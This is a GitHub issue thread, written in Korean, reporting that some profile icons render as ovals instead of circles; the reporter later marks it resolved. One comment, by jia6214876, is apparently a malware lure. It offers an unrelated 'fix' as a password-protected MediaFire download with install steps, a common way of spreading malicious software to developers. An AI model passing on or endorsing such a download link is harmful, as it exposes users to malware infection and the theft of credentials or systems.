### ISSUE TITLE
[BUG] {프로필 사진 크기 다르게 출력}

### ISSUE THREAD

**Issue by sen2y** [100-hours-a-week/5-team-ark-connectrip-fe#41]
### 버그 현상 설명

프로필 아이콘 크기가 원이 아니고 타원으로 출력되는데 일부만 그래요

---

### 발생 과정

{ 버그를 발생 시키는 행동 과정을 적어주세요.

4. See error }

---

### 예상 대책

{예상되는 대책을 적어주세요. 없다면 없다고 적어주세요.}

---

### 스크린샷

{버그 발생 화면을 스크린샷으로 남겨주세요.}
<img width="354" alt="image" src="https://github.com/user-attachments/assets/c28dc92d-0e3b-42a8-92c1-b64515799286">
<img width="354" alt="image" src="https://github.com/user-attachments/assets/cbdf54a2-c767-48b5-8258-ace0f15ae8c7">

---

### 기타 주석

{끝으로 남기고 싶은 기타 주석을 적어주세요. 없다면 지워주세요.}

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by sen2y** [comment]
<img width="204" alt="image" src="https://github.com/user-attachments/assets/d4b2314f-7307-4a28-83ec-71dfa87cdd42">
해결완료
